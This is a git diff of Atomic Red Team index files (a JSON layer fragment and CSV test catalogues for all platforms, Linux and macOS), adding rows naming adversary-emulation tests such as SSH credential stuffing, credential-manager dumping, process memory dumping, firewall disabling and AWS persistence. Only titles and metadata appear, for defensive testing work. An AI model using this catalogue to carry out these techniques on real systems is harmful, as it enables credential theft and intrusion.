red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index da09d5a0..f727969f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -5,12 +5,16 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -62,6 +66,8 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -192,6 +198,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
 privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
@@ -265,10 +272,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -318,7 +326,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
-defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
+defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
 defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -353,9 +361,12 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -481,6 +492,8 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
 persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -499,6 +512,7 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-
 persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -565,6 +579,7 @@ persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364
 persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
@@ -587,6 +602,7 @@ impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce08
 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
 impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
 impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -788,6 +804,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
@@ -815,6 +832,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
@@ -836,6 +854,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
 command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index d7c342f8..31e71a51 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
@@ -11,6 +12,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
 collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -42,6 +45,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
 privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -87,6 +91,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
@@ -146,10 +151,13 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -164,6 +172,7 @@ persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3
 persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -174,6 +183,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
 command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
 command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 721cf97b..b0eec59f 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
@@ -74,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
@@ -157,6 +159,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
